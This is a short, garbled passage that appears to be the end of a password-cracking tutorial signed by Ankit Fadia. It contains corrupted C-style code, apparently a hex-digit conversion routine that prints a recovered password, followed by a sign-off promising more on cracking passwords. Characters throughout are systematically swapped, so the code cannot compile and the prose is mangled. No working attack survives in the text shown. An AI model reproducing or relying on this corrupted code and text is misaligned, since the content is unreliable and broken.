  coutXX[n?nd N4R string: [W



  coutXX$e)XXs<QiSXX[ [W





coutXX[Password is: [W


return =W


int $e)dig0c$ar *2I

  i%0*ZE *XUV2return EVW

  i%0*ZGE *X12return UUW

  i%0*Z>G *X1=<2return VW

  return =W



int $e)int0c$ar p'c$ar *2I

  return 1G0p8$e)dig0p220*8$e)dig0*22W




"ell' t$at is all %or now' & will update t$is #anual e)plaining $ow to crack #ore passwords (ery (ery soon' so $ang in t$ere!


Ankit Fadia


